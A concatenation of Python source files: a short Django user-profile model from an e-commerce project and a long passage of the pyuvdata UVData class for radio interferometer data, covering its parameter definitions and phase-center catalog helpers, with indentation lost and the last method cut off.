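#   evaluator = ClusteringModelUnsupervisedEvaluator(datapoints)
#   eval_stats = evaluator.evalModel(model)  # fits `model` on `datapoints` by default
#   metrics = eval_stats.getAll()            # dict of metric name -> value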
class Module3(object):
    pass
# aryanshridhar/Ecommerce-Website
from django.db import models
from django.contrib.auth.models import User
import os
class Profile(models.Model):
user = models.OneToOneField(User , on_delete = models.CASCADE)
image = models.ImageField(default='default.jpg' , upload_to='Ecommerce/images')
def __str__(self):
return self.user.username
def filename(self):
return os.path.basename(self.image.name)
# e-koch/pyuvdata
# -*- mode: python; coding: utf-8 -*-
# Copyright (c) 2018 Radio Astronomy Software Group
# Licensed under the 2-clause BSD License
"""Primary container for radio interferometer datasets."""
import os
import copy
from collections.abc import Iterable
import warnings
import threading
import numpy as np
from scipy import ndimage as nd
from astropy import constants as const
import astropy.units as units
from astropy.time import Time
from astropy.coordinates import SkyCoord, EarthLocation, FK5, Angle
from astropy import coordinates as coord
from ..uvbase import UVBase
from .. import parameter as uvp
from .. import telescopes as uvtel
from .. import utils as uvutils
__all__ = ["UVData"]
class UVData(UVBase):
"""
A class for defining a radio interferometer dataset.
Currently supported file types: uvfits, miriad, fhd.
Provides phasing functions.
Attributes
----------
UVParameter objects :
For full list see UVData Parameters
(http://pyuvdata.readthedocs.io/en/latest/uvdata_parameters.html).
Some are always required, some are required for certain phase_types
and others are always optional.
"""
def __init__(self):
"""Create a new UVData object."""
# add the UVParameters to the class
# standard angle tolerance: 1 mas in radians.
radian_tol = 1 * 2 * np.pi * 1e-3 / (60.0 * 60.0 * 360.0)
self._Ntimes = uvp.UVParameter(
"Ntimes", description="Number of times", expected_type=int
)
self._Nbls = uvp.UVParameter(
"Nbls", description="Number of baselines", expected_type=int
)
self._Nblts = uvp.UVParameter(
"Nblts",
description="Number of baseline-times "
"(i.e. number of spectra). Not necessarily "
"equal to Nbls * Ntimes",
expected_type=int,
)
self._Nfreqs = uvp.UVParameter(
"Nfreqs", description="Number of frequency channels", expected_type=int
)
self._Npols = uvp.UVParameter(
"Npols", description="Number of polarizations", expected_type=int
)
desc = (
"Array of the visibility data, shape: (Nblts, 1, Nfreqs, "
"Npols) or (Nblts, Nfreqs, Npols) if future_array_shapes=True, "
"type = complex float, in units of self.vis_units"
)
# TODO: Spw axis to be collapsed in future release
self._data_array = uvp.UVParameter(
"data_array",
description=desc,
form=("Nblts", 1, "Nfreqs", "Npols"),
expected_type=complex,
)
desc = 'Visibility units, options are: "uncalib", "Jy" or "K str"'
self._vis_units = uvp.UVParameter(
"vis_units",
description=desc,
form="str",
expected_type=str,
acceptable_vals=["uncalib", "Jy", "K str"],
)
desc = (
"Number of data points averaged into each data element, "
"NOT required to be an integer, type = float, same shape as data_array."
"The product of the integration_time and the nsample_array "
"value for a visibility reflects the total amount of time "
"that went into the visibility. Best practice is for the "
"nsample_array to be used to track flagging within an integration_time "
"(leading to a decrease of the nsample array value below 1) and "
"LST averaging (leading to an increase in the nsample array "
"value). So datasets that have not been LST averaged should "
"have nsample array values less than or equal to 1."
"Note that many files do not follow this convention, but it is "
"safe to assume that the product of the integration_time and "
"the nsample_array is the total amount of time included in a visibility."
)
self._nsample_array = uvp.UVParameter(
"nsample_array",
description=desc,
form=("Nblts", 1, "Nfreqs", "Npols"),
expected_type=float,
)
desc = "Boolean flag, True is flagged, same shape as data_array."
self._flag_array = uvp.UVParameter(
"flag_array",
description=desc,
form=("Nblts", 1, "Nfreqs", "Npols"),
expected_type=bool,
)
self._Nspws = uvp.UVParameter(
"Nspws",
description="Number of spectral windows "
"(ie non-contiguous spectral chunks). ",
expected_type=int,
)
self._spw_array = uvp.UVParameter(
"spw_array",
description="Array of spectral window numbers, shape (Nspws)",
form=("Nspws",),
expected_type=int,
)
desc = (
"Projected baseline vectors relative to phase center, "
"shape (Nblts, 3), units meters. "
"Convention is: uvw = xyz(ant2) - xyz(ant1)."
"Note that this is the Miriad convention but it is different "
"from the AIPS/FITS convention (where uvw = xyz(ant1) - xyz(ant2))."
)
self._uvw_array = uvp.UVParameter(
"uvw_array",
description=desc,
form=("Nblts", 3),
expected_type=float,
acceptable_range=(0, 1e8),
tols=1e-3,
)
desc = (
"Array of times, center of integration, shape (Nblts), " "units Julian Date"
)
self._time_array = uvp.UVParameter(
"time_array",
description=desc,
form=("Nblts",),
expected_type=float,
tols=1e-3 / (60.0 * 60.0 * 24.0),
) # 1 ms in days
desc = (
"Array of local apparent sidereal times (LAST) at the center of "
"integration, shape (Nblts), units radians."
)
self._lst_array = uvp.UVParameter(
"lst_array",
description=desc,
form=("Nblts",),
expected_type=float,
tols=radian_tol,
)
desc = (
"Array of numbers for the first antenna, which is matched to that in "
"the antenna_numbers attribute. Shape (Nblts), type = int."
)
self._ant_1_array = uvp.UVParameter(
"ant_1_array", description=desc, expected_type=int, form=("Nblts",)
)
desc = (
"Array of numbers for the second antenna, which is matched to that in "
"the antenna_numbers attribute. Shape (Nblts), type = int."
)
self._ant_2_array = uvp.UVParameter(
"ant_2_array", description=desc, expected_type=int, form=("Nblts",)
)
desc = (
"Array of baseline numbers, shape (Nblts), "
"type = int; baseline = 2048 * (ant1+1) + (ant2+1) + 2^16"
)
self._baseline_array = uvp.UVParameter(
"baseline_array", description=desc, expected_type=int, form=("Nblts",),
)
# this dimensionality of freq_array does not allow for different spws
# to have different dimensions
desc = (
"Array of frequencies, center of the channel, "
"shape (1, Nfreqs) or (Nfreqs,) if future_array_shapes=True, units Hz"
)
# TODO: Spw axis to be collapsed in future release
self._freq_array = uvp.UVParameter(
"freq_array",
description=desc,
form=(1, "Nfreqs"),
expected_type=float,
tols=1e-3,
) # mHz
desc = (
"Array of polarization integers, shape (Npols). "
"AIPS Memo 117 says: pseudo-stokes 1:4 (pI, pQ, pU, pV); "
"circular -1:-4 (RR, LL, RL, LR); linear -5:-8 (XX, YY, XY, YX). "
"NOTE: AIPS Memo 117 actually calls the pseudo-Stokes polarizations "
'"Stokes", but this is inaccurate as visibilities cannot be in '
"true Stokes polarizations for physical antennas. We adopt the "
"term pseudo-Stokes to refer to linear combinations of instrumental "
"visibility polarizations (e.g. pI = xx + yy)."
)
self._polarization_array = uvp.UVParameter(
"polarization_array",
description=desc,
expected_type=int,
acceptable_vals=list(np.arange(-8, 0)) + list(np.arange(1, 5)),
form=("Npols",),
)
desc = (
"Length of the integration in seconds, shape (Nblts). "
"The product of the integration_time and the nsample_array "
"value for a visibility reflects the total amount of time "
"that went into the visibility. Best practice is for the "
"integration_time to reflect the length of time a visibility "
"was integrated over (so it should vary in the case of "
"baseline-dependent averaging and be a way to do selections "
"for differently integrated baselines)."
"Note that many files do not follow this convention, but it is "
"safe to assume that the product of the integration_time and "
"the nsample_array is the total amount of time included in a visibility."
)
self._integration_time = uvp.UVParameter(
"integration_time",
description=desc,
form=("Nblts",),
expected_type=float,
tols=1e-3,
) # 1 ms
desc = (
"Width of frequency channels (Hz). If flex_spw = False and "
"future_array_shapes=False, then it is a "
"single value of type = float, otherwise it is an array of shape "
"(Nfreqs), type = float."
)
self._channel_width = uvp.UVParameter(
"channel_width", description=desc, expected_type=float, tols=1e-3,
) # 1 mHz
desc = (
"Name(s) of source(s) or field(s) observed, type string. If "
'multi_phase_center = True, set to "multi".'
)
self._object_name = uvp.UVParameter(
"object_name", description=desc, form="str", expected_type=str,
)
# --- multi phase center handling ---
desc = (
            'Only relevant if phase_type = "phased". Specifies that the data set '
"contains multiple sources within it."
)
self._multi_phase_center = uvp.UVParameter(
"multi_phase_center", description=desc, expected_type=bool, value=False,
)
desc = (
"Required if multi_phase_center = True. Specifies the number of sources "
"contained within the data set."
)
self._Nphase = uvp.UVParameter(
"Nphase", description=desc, expected_type=int, required=False,
)
desc = (
"Only relevant if multi_phase_center = True. Dictionary that acts as a "
"catalog, containing information on individual phase centers. Keys are the "
"names of the different phase centers in the UVData object. At a minimum, "
'each dictionary must contain the key "cat_type", which can be either '
'"sidereal" (fixed position in RA/Dec), "ephem" (position in RA/Dec which'
'moves with time), "driftscan" (fixed postion in Az/El, NOT the same as '
'`phase_type`="drift") and "unphased" (baseline coordinates in ENU, but '
'data are not phased, similar to `phase_type`="drift"). Other typical '
'keyworks include "cat_lon" (longitude coord, e.g. RA), "cat_lat" '
'(latitude coord, e.g. Dec.), "cat_frame" (coordinate frame, e.g. '
'icrs), "cat_epoch" (epoch and equinox of the coordinate frame), '
'"cat_times" (times for the coordinates, only used for "ephem" '
'types), "cat_pm_ra" (proper motion in RA), "cat_pm_dec" (proper '
'motion in Dec), "cat_dist" (physical distance), "cat_vrad" ('
'rest frame velocity), "info_source" (describes where catalog info came '
'from), and "cat_id" (matched to the parameter `phase_center_id_array`. '
"See the documentation of the `phase` method for more details."
)
self._phase_center_catalog = uvp.UVParameter(
"phase_center_catalog",
description=desc,
expected_type=dict,
required=False,
)
self._telescope_name = uvp.UVParameter(
"telescope_name",
description="Name of telescope " "(string)",
form="str",
expected_type=str,
)
self._instrument = uvp.UVParameter(
"instrument",
description="Receiver or backend. " "Sometimes identical to telescope_name",
form="str",
expected_type=str,
)
desc = (
"Telescope location: xyz in ITRF (earth-centered frame). "
"Can also be accessed using telescope_location_lat_lon_alt or "
"telescope_location_lat_lon_alt_degrees properties"
)
self._telescope_location = uvp.LocationParameter(
"telescope_location",
description=desc,
acceptable_range=(6.35e6, 6.39e6),
tols=1e-3,
)
self._history = uvp.UVParameter(
"history",
description="String of history, units English",
form="str",
expected_type=str,
)
# --- flexible spectral window information ---
desc = (
'Option to construct a "flexible spectral window", which stores'
"all spectral channels across the frequency axis of data_array. "
"Allows for spectral windows of variable sizes, and channels of "
"varying widths."
)
self._flex_spw = uvp.UVParameter(
"flex_spw", description=desc, expected_type=bool, value=False,
)
desc = (
"Required if flex_spw = True. Maps individual channels along the "
"frequency axis to individual spectral windows, as listed in the "
"spw_array. Shape (Nfreqs), type = int."
)
self._flex_spw_id_array = uvp.UVParameter(
"flex_spw_id_array",
description=desc,
form=("Nfreqs",),
expected_type=int,
required=False,
)
desc = "Flag indicating that this object is using the future array shapes."
self._future_array_shapes = uvp.UVParameter(
"future_array_shapes", description=desc, expected_type=bool, value=False,
)
# --- phasing information ---
desc = (
'String indicating phasing type. Allowed values are "drift" and '
'"phased" (n.b., "drift" is not the same as `cat_type="driftscan"`, '
"the latter of which _is_ phased to a fixed az-el position)."
)
self._phase_type = uvp.UVParameter(
"phase_type",
form="str",
expected_type=str,
description=desc,
value=None,
acceptable_vals=["drift", "phased"],
)
desc = (
'Required if phase_type = "phased". Epoch year of the phase '
"applied to the data (eg 2000.)"
)
self._phase_center_epoch = uvp.UVParameter(
"phase_center_epoch", required=False, description=desc, expected_type=float,
)
desc = (
"Required if phase_type = 'phased'. Right ascension of phase "
"center (see uvw_array), units radians. Can also be accessed using "
"phase_center_ra_degrees."
)
self._phase_center_ra = uvp.AngleParameter(
"phase_center_ra",
required=False,
description=desc,
expected_type=float,
tols=radian_tol,
)
desc = (
'Required if phase_type = "phased". Declination of phase center '
"(see uvw_array), units radians. Can also be accessed using "
"phase_center_dec_degrees."
)
self._phase_center_dec = uvp.AngleParameter(
"phase_center_dec",
required=False,
description=desc,
expected_type=float,
tols=radian_tol,
)
desc = (
'Required if phase_type = "phased". Apparent right ascension of phase '
"center in the topocentric frame of the observatory, units radians."
"Shape (Nblts,), type = float."
)
self._phase_center_app_ra = uvp.AngleParameter(
"phase_center_app_ra",
required=False,
form=("Nblts",),
expected_type=float,
description=desc,
tols=radian_tol,
)
desc = (
'Required if phase_type = "phased". Declination of phase center '
"in the topocentric frame of the observatory, units radians. "
"Shape (Nblts,), type = float."
)
self._phase_center_app_dec = uvp.AngleParameter(
"phase_center_app_dec",
required=False,
form=("Nblts",),
expected_type=float,
description=desc,
tols=radian_tol,
)
desc = (
'Required if phase_type = "phased". Position angle between the hour '
"circle (which is a great circle that goes through the target postion and "
"both poles) in the apparent/topocentric frame, and the frame given in "
"the phase_center_frame attribute."
"Shape (Nblts,), type = float."
)
        # The tolerance here is set by the fact that it is calculated using an arctan,
# the limiting precision of which happens around values of 1.
self._phase_center_frame_pa = uvp.AngleParameter(
"phase_center_frame_pa",
required=False,
form=("Nblts",),
expected_type=float,
description=desc,
tols=2e-8,
)
desc = (
'Only relevant if phase_type = "phased". Specifies the frame the'
' data and uvw_array are phased to. Options are "icrs", "gcrs", and "fk5";'
' default is "icrs"'
)
self._phase_center_frame = uvp.UVParameter(
"phase_center_frame",
required=False,
description=desc,
expected_type=str,
acceptable_vals=["icrs", "gcrs", "fk5"],
)
desc = (
"Required if multi_phase_center = True. Maps individual indices along the "
"Nblt axis to an entry in `phase_center_catalog`, with the ID number of "
"individual entries stored as `cat_id`, along with other metadata. "
"Shape (Nblts), type = int."
)
self._phase_center_id_array = uvp.UVParameter(
"phase_center_id_array",
description=desc,
form=("Nblts",),
expected_type=int,
required=False,
)
desc = (
"Optional when reading a MS. Retains the scan number when reading a MS."
" Shape (Nblts), type = int."
)
self._scan_number_array = uvp.UVParameter(
"scan_number_array",
description=desc,
form=("Nblts",),
expected_type=int,
required=False,
)
# --- antenna information ----
desc = (
"Number of antennas with data present (i.e. number of unique "
"entries in ant_1_array and ant_2_array). May be smaller "
"than the number of antennas in the array"
)
self._Nants_data = uvp.UVParameter(
"Nants_data", description=desc, expected_type=int
)
desc = (
"Number of antennas in the array. May be larger "
"than the number of antennas with data"
)
self._Nants_telescope = uvp.UVParameter(
"Nants_telescope", description=desc, expected_type=int
)
desc = (
"List of antenna names, shape (Nants_telescope), "
"with numbers given by antenna_numbers (which can be matched "
"to ant_1_array and ant_2_array). There must be one entry "
"here for each unique entry in ant_1_array and "
"ant_2_array, but there may be extras as well. "
)
self._antenna_names = uvp.UVParameter(
"antenna_names",
description=desc,
form=("Nants_telescope",),
expected_type=str,
)
desc = (
"List of integer antenna numbers corresponding to antenna_names, "
"shape (Nants_telescope). There must be one "
"entry here for each unique entry in ant_1_array and "
"ant_2_array, but there may be extras as well."
"Note that these are not indices -- they do not need to start "
"at zero or be continuous."
)
self._antenna_numbers = uvp.UVParameter(
"antenna_numbers",
description=desc,
form=("Nants_telescope",),
expected_type=int,
)
desc = (
"Array giving coordinates of antennas relative to "
"telescope_location (ITRF frame), shape (Nants_telescope, 3), "
"units meters. See the tutorial page in the documentation "
"for an example of how to convert this to topocentric frame."
)
self._antenna_positions = uvp.UVParameter(
"antenna_positions",
description=desc,
form=("Nants_telescope", 3),
expected_type=float,
tols=1e-3, # 1 mm
)
# -------- extra, non-required parameters ----------
desc = (
"Orientation of the physical dipole corresponding to what is "
"labelled as the x polarization. Options are 'east' "
"(indicating east/west orientation) and 'north (indicating "
"north/south orientation)"
)
self._x_orientation = uvp.UVParameter(
"x_orientation",
description=desc,
required=False,
expected_type=str,
acceptable_vals=["east", "north"],
)
blt_order_options = ["time", "baseline", "ant1", "ant2", "bda"]
desc = (
"Ordering of the data array along the blt axis. A tuple with "
'the major and minor order (minor order is omitted if order is "bda"). '
"The allowed values are: "
+ " ,".join([str(val) for val in blt_order_options])
)
self._blt_order = uvp.UVParameter(
"blt_order",
description=desc,
form=(2,),
required=False,
expected_type=str,
acceptable_vals=blt_order_options,
)
desc = (
"Any user supplied extra keywords, type=dict. Keys should be "
"8 character or less strings if writing to uvfits or miriad files. "
'Use the special key "comment" for long multi-line string comments.'
)
self._extra_keywords = uvp.UVParameter(
"extra_keywords",
required=False,
description=desc,
value={},
spoof_val={},
expected_type=dict,
)
desc = (
"Array of antenna diameters in meters. Used by CASA to "
"construct a default beam if no beam is supplied."
)
self._antenna_diameters = uvp.UVParameter(
"antenna_diameters",
required=False,
description=desc,
form=("Nants_telescope",),
expected_type=float,
tols=1e-3, # 1 mm
)
# --- other stuff ---
# the below are copied from AIPS memo 117, but could be revised to
# merge with other sources of data.
self._gst0 = uvp.UVParameter(
"gst0",
required=False,
description="Greenwich sidereal time at " "midnight on reference date",
spoof_val=0.0,
expected_type=float,
)
self._rdate = uvp.UVParameter(
"rdate",
required=False,
description="Date for which the GST0 or " "whatever... applies",
spoof_val="",
form="str",
)
self._earth_omega = uvp.UVParameter(
"earth_omega",
required=False,
description="Earth's rotation rate " "in degrees per day",
spoof_val=360.985,
expected_type=float,
)
self._dut1 = uvp.UVParameter(
"dut1",
required=False,
description="DUT1 (google it) AIPS 117 " "calls it UT1UTC",
spoof_val=0.0,
expected_type=float,
)
self._timesys = uvp.UVParameter(
"timesys",
required=False,
description="We only support UTC",
spoof_val="UTC",
form="str",
)
desc = (
"FHD thing we do not understand, something about the time "
"at which the phase center is normal to the chosen UV plane "
"for phasing"
)
self._uvplane_reference_time = uvp.UVParameter(
"uvplane_reference_time", required=False, description=desc, spoof_val=0
)
desc = "Per-antenna and per-frequency equalization coefficients"
self._eq_coeffs = uvp.UVParameter(
"eq_coeffs",
required=False,
description=desc,
form=("Nants_telescope", "Nfreqs"),
expected_type=float,
spoof_val=1.0,
)
desc = "Convention for how to remove eq_coeffs from data"
self._eq_coeffs_convention = uvp.UVParameter(
"eq_coeffs_convention",
required=False,
description=desc,
form="str",
spoof_val="divide",
)
desc = (
"List of strings containing the unique basenames (not the full path) of "
"input files."
)
self._filename = uvp.UVParameter(
"filename", required=False, description=desc, expected_type=str,
)
super(UVData, self).__init__()
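    # Usage sketch (hypothetical file name): a UVData object is normally populated by
    # one of the file readers rather than by assigning these parameters directly, e.g.
    #   uvd = UVData()
    #   uvd.read("my_observation.uvfits")
    #   print(uvd.Nblts, uvd.Nfreqs, uvd.Npols)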
def _set_flex_spw(self):
"""
Set flex_spw to True, and adjust required parameters.
This method should not be called directly by users; instead it is called
by the file-reading methods to indicate that an object has multiple spectral
windows concatenated together across the frequency axis.
"""
# Mark once-optional arrays as now required
self.flex_spw = True
self._flex_spw_id_array.required = True
# Now make sure that chan_width is set to be an array
self._channel_width.form = ("Nfreqs",)
def _set_scan_numbers(self, override=False):
"""
Set scan numbers by grouping consecutive integrations on the same phase center.
This approach mimics the definition of scan number in measurement sets and is
especially helpful for distinguishing between repeated visits to multiple
phase centers.
Parameters
----------
override : bool
When True, will redefine existing scan numbers. Default is False.
"""
if self.scan_number_array is None or override:
# We are grouping based on integrations on a phase center.
# If this isn't defined, we cannot define scan numbers in this way
# and default to a single "scan".
if self.phase_center_catalog is None:
self.scan_number_array = np.ones((self.Nblts,), dtype=int)
else:
sou_list = list(self.phase_center_catalog.keys())
sou_list.sort()
slice_list = []
# This loops over phase centers, finds contiguous integrations with
# ndimage.label, and then finds the slices to return those contiguous
# integrations with nd.find_objects.
for idx in range(self.Nphase):
sou_id = self.phase_center_catalog[sou_list[idx]]["cat_id"]
slice_list.extend(
nd.find_objects(
nd.label(self.phase_center_id_array == sou_id)[0]
)
)
# Sort by start integration number, which we can extract from
# the start of each slice in the list.
slice_list_ord = sorted(slice_list, key=lambda x: x[0].start)
# Incrementally increase the scan number with each group in
# slice_list_ord
scan_array = np.zeros_like(self.phase_center_id_array)
for ii, slice_scan in enumerate(slice_list_ord):
scan_array[slice_scan] = ii + 1
self.scan_number_array = scan_array
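    # Worked example of the grouping above (hypothetical IDs): for a
    # phase_center_id_array of [0, 0, 1, 1, 0, 0], the contiguous runs are
    # [0:2] (id 0), [2:4] (id 1) and [4:6] (id 0); sorted by start index they
    # yield a scan_number_array of [1, 1, 2, 2, 3, 3].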
def _look_in_catalog(
self,
cat_name,
phase_dict=None,
cat_type=None,
cat_lon=None,
cat_lat=None,
cat_frame=None,
cat_epoch=None,
cat_times=None,
cat_pm_ra=None,
cat_pm_dec=None,
cat_dist=None,
cat_vrad=None,
ignore_name=False,
):
"""
Check the catalog to see if an existing entry matches provided data.
This is a helper function for verifying if an entry already exists within
the catalog, contained within the attribute `phase_center_catalog`.
Parameters
----------
cat_name : str
Name of the phase center, which should match a key in
`phase_center_catalog`.
phase_dict : dict
Instead of providing individual parameters, one may provide a dict which
matches that format used within `phase_center_catalog` for checking for
existing entries. If used, all other parameters (save for `ignore_name` and
`cat_name`) are disregarded.
cat_type : str
Type of phase center of the entry. Must be one of:
"sidereal" (fixed RA/Dec),
"ephem" (RA/Dec that moves with time),
"driftscan" (fixed az/el position),
"unphased" (no w-projection, equivalent to `phase_type` == "drift").
cat_lon : float or ndarray
Value of the longitudinal coordinate (e.g., RA, Az, l) of the phase center.
No default, not used when `cat_type="unphased"`. Expected to be a float for
sidereal and driftscan phase centers, and an ndarray of floats of shape
(Npts,) for ephem phase centers.
cat_lat : float or ndarray
Value of the latitudinal coordinate (e.g., Dec, El, b) of the phase center.
No default, not used when `cat_type="unphased"`. Expected to be a float for
sidereal and driftscan phase centers, and an ndarray of floats of shape
(Npts,) for ephem phase centers.
cat_frame : str
Coordinate frame that cat_lon and cat_lat are given in. Only used for
sidereal and ephem phase centers. Can be any of the several supported frames
in astropy (a limited list: fk4, fk5, icrs, gcrs, cirs, galactic).
cat_epoch : str or float
Epoch of the coordinates, only used when cat_frame = fk4 or fk5. Given
            in units of fractional years, either as a float or as a string with the
epoch abbreviation (e.g, Julian epoch 2000.0 would be J2000.0).
cat_times : ndarray of floats
Only used when `cat_type="ephem"`. Describes the time for which the values
            of `cat_lon` and `cat_lat` are calculated, in units of JD. Shape is (Npts,).
cat_pm_ra : float
Proper motion in RA, in units of mas/year. Only used for sidereal phase
centers.
cat_pm_dec : float
Proper motion in Dec, in units of mas/year. Only used for sidereal phase
centers.
cat_dist : float or ndarray of float
Distance of the source, in units of pc. Only used for sidereal and ephem
phase centers. Expected to be a float for sidereal and driftscan phase
centers, and an ndarray of floats of shape (Npts,) for ephem phase centers.
cat_vrad : float or ndarray of float
Radial velocity of the source, in units of km/s. Only used for sidereal and
ephem phase centers. Expected to be a float for sidereal and driftscan phase
centers, and an ndarray of floats of shape (Npts,) for ephem phase centers.
ignore_name : bool
Nominally, `_look_in_catalog` will only look at entries where `cat_name`
matches the name of an entry in the catalog. However, by setting this to
True, the method will search all entries in the catalog and see if any
match all of the provided data (excluding `cat_name`).
Returns
-------
cat_id : int or None
The unique ID number for the phase center added to the internal catalog.
This value is used in the `phase_center_id_array` attribute to denote which
source a given baseline-time corresponds to. If no catalog entry matches,
then None is returned.
cat_diffs : int
The number of differences between the information provided and the catalog
entry contained within `phase_center_catalog`. If everything matches, then
`cat_diffs=0`.
"""
# 1 marcsec tols
radian_tols = (0, 1 * 2 * np.pi * 1e-3 / (60.0 * 60.0 * 360.0))
default_tols = (1e-5, 1e-8)
cat_id = None
cat_diffs = 0
# Emulate the defaults that are set if None is detected for
# unphased and driftscan types.
if (cat_type == "unphased") or (cat_type == "driftscan"):
if cat_lon is None:
cat_lon = 0.0
if cat_lat is None:
cat_lat = np.pi / 2
if cat_frame is None:
cat_frame = "altaz"
if phase_dict is None:
phase_dict = {
"cat_type": cat_type,
"cat_lon": cat_lon,
"cat_lat": cat_lat,
"cat_frame": cat_frame,
"cat_epoch": cat_epoch,
"cat_times": cat_times,
"cat_pm_ra": cat_pm_ra,
"cat_pm_dec": cat_pm_dec,
"cat_dist": cat_dist,
"cat_vrad": cat_vrad,
}
if self.multi_phase_center:
check_dict = self.phase_center_catalog
else:
check_dict = {}
is_phased = self.phase_type == "phased"
check_dict[self.object_name] = {
"cat_type": "sidereal" if is_phased else "unphased",
"cat_lon": self.phase_center_ra if is_phased else 0.0,
"cat_lat": self.phase_center_dec if is_phased else np.pi / 2.0,
"cat_frame": self.phase_center_frame if is_phased else "altaz",
"cat_epoch": self.phase_center_epoch if is_phased else None,
"cat_times": None,
"cat_pm_ra": None,
"cat_pm_dec": None,
"cat_dist": None,
"cat_vrad": None,
"cat_id": 0,
}
tol_dict = {
"cat_type": None,
"cat_lon": radian_tols,
"cat_lat": radian_tols,
"cat_frame": None,
"cat_epoch": None,
"cat_times": default_tols,
"cat_pm_ra": default_tols,
"cat_pm_dec": default_tols,
"cat_dist": default_tols,
"cat_vrad": default_tols,
}
if self.multi_phase_center:
name_list = list(self.phase_center_catalog.keys())
else:
name_list = [self.object_name]
for name in name_list:
cat_diffs = 0
if (cat_name != name) and (not ignore_name):
continue
for key in tol_dict.keys():
if phase_dict.get(key) is not None:
if check_dict[name].get(key) is None:
cat_diffs += 1
elif tol_dict[key] is None:
# If no tolerance specified, expect attributes to be identical
cat_diffs += phase_dict.get(key) != check_dict[name].get(key)
else:
# Numpy will throw a Value error if you have two arrays
# of different shape, which we can catch to flag that
# the two arrays are actually not within tolerance.
if np.shape(phase_dict[key]) != np.shape(check_dict[name][key]):
cat_diffs += 1
else:
cat_diffs += not np.allclose(
phase_dict[key],
check_dict[name][key],
tol_dict[key][0],
tol_dict[key][1],
)
else:
cat_diffs += check_dict[name][key] is not None
if (cat_diffs == 0) or (cat_name == name):
cat_id = check_dict[name]["cat_id"]
break
return cat_id, cat_diffs
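    # Sketch of how the (cat_id, cat_diffs) pair returned above is typically read:
    #   cat_id is None                -> no matching entry was found
    #   cat_id set and cat_diffs == 0 -> an entry with identical parameters exists
    #   cat_id set and cat_diffs > 0  -> an entry with this name exists, but with
    #                                    different parameters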
def _add_phase_center(
self,
cat_name,
cat_type=None,
cat_lon=None,
cat_lat=None,
cat_frame=None,
cat_epoch=None,
cat_times=None,
cat_pm_ra=None,
cat_pm_dec=None,
cat_dist=None,
cat_vrad=None,
info_source="user",
force_update=False,
cat_id=None,
):
"""
Add an entry to the internal object/source catalog.
This is a helper function for adding a source to the internal
catalog, contained within the attribute `phase_center_catalog`.
Parameters
----------
cat_name : str
Name of the phase center to be added, must be unique (i.e., not contained
as a key in the UVData attribute `phase_center_catalog`).
cat_type : str
Type of phase center to be added. Must be one of:
"sidereal" (fixed RA/Dec),
"ephem" (RA/Dec that moves with time),
"driftscan" (fixed az/el position),
"unphased" (no w-projection, equivalent to `phase_type` == "drift").
cat_lon : float or ndarray
Value of the longitudinal coordinate (e.g., RA, Az, l) of the phase center.
No default, not used when `cat_type="unphased"`. Expected to be a float for
sidereal and driftscan phase centers, and an ndarray of floats of shape
(Npts,) for ephem phase centers.
cat_lat : float or ndarray
Value of the latitudinal coordinate (e.g., Dec, El, b) of the phase center.
No default, not used when `cat_type="unphased"`. Expected to be a float for
sidereal and driftscan phase centers, and an ndarray of floats of shape
(Npts,) for ephem phase centers.
cat_frame : str
Coordinate frame that cat_lon and cat_lat are given in. Only used
for sidereal and ephem targets. Can be any of the several supported frames
in astropy (a limited list: fk4, fk5, icrs, gcrs, cirs, galactic).
cat_epoch : str or float
Epoch of the coordinates, only used when cat_frame = fk4 or fk5. Given
            in units of fractional years, either as a float or as a string with the
epoch abbreviation (e.g, Julian epoch 2000.0 would be J2000.0).
cat_times : ndarray of floats
Only used when `cat_type="ephem"`. Describes the time for which the values
            of `cat_lon` and `cat_lat` are calculated, in units of JD. Shape is (Npts,).
cat_pm_ra : float
Proper motion in RA, in units of mas/year. Only used for sidereal phase
centers.
cat_pm_dec : float
Proper motion in Dec, in units of mas/year. Only used for sidereal phase
centers.
cat_dist : float or ndarray of float
Distance of the source, in units of pc. Only used for sidereal and ephem
phase centers. Expected to be a float for sidereal and driftscan phase
centers, and an ndarray of floats of shape (Npts,) for ephem phase centers.
cat_vrad : float or ndarray of float
Radial velocity of the source, in units of km/s. Only used for sidereal and
ephem phase centers. Expected to be a float for sidereal and driftscan phase
centers, and an ndarray of floats of shape (Npts,) for ephem phase centers.
info_source : str
Optional string describing the source of the information provided. Used
primarily in UVData to denote when an ephemeris has been supplied by the
JPL-Horizons system, user-supplied, or read in by one of the various file
interpreters. Default is 'user'.
force_update : bool
Normally, `_add_phase_center` will throw an error if there already exists an
identically named phase center with different properties. However, if one
sets `force_update=True`, the method will overwrite the existing entry in
            `phase_center_catalog` with the parameters supplied, preserving only the
            parameters `cat_id` and `cat_name`. Note that doing this will _not_ update
            other attributes of the `UVData` object. Default is False.
cat_id : int
An integer signifying the ID number for the phase center, used in the
`phase_center_id_array` attribute. The default is for the method to assign
this value automatically.
Returns
-------
cat_id : int
The unique ID number for the phase center added to the internal catalog.
This value is used in the `phase_center_id_array` attribute to denote which
source a given baseline-time corresponds to.
Raises
------
ValueError
If attempting to add a non-unique source name, attempting to use the method
w/ a UVData object where multi_phase_center=False, or if adding a sidereal
source without coordinates.
"""
# Check whether we should actually be doing this in the first place
if not self.multi_phase_center:
raise ValueError("Cannot add a source if multi_phase_center != True.")
if not isinstance(cat_name, str):
raise ValueError("cat_name must be a string.")
# The catalog name "unphased" is used internally whenever we have to make a
# block of data as unphased in a data set. To avoid naming collisions, check
# that someone hasn't tried to use it for any other purpose.
if (cat_name == "unphased") and (cat_type != "unphased"):
raise ValueError(
"The name unphased is reserved. Please choose another value for "
"cat_name."
)
# We currently only have 4 supported types -- make sure the user supplied
# one of those
if cat_type not in ["sidereal", "ephem", "driftscan", "unphased"]:
raise ValueError(
"Only sidereal, ephem, driftscan or unphased may be used "
"for cat_type."
)
# Both proper motion parameters need to be set together
if (cat_pm_ra is None) != (cat_pm_dec is None):
raise ValueError(
"Must supply values for either both or neither of "
"cat_pm_ra and cat_pm_dec."
)
# If left unset, unphased and driftscan defaulted to Az, El = (0, 90)
if (cat_type == "unphased") or (cat_type == "driftscan"):
if cat_lon is None:
cat_lon = 0.0
if cat_lat is None:
cat_lat = np.pi / 2
if cat_frame is None:
cat_frame = "altaz"
        # Let's check some case-specific things and make sure all the entries are valid
if (cat_times is None) and (cat_type == "ephem"):
raise ValueError("cat_times cannot be None for ephem object.")
elif (cat_times is not None) and (cat_type != "ephem"):
raise ValueError("cat_times cannot be used for non-ephem phase centers.")
if (cat_lon is None) and (cat_type in ["sidereal", "ephem"]):
raise ValueError("cat_lon cannot be None for sidereal phase centers.")
if (cat_lat is None) and (cat_type in ["sidereal", "ephem"]):
raise ValueError("cat_lat cannot be None for sidereal phase centers.")
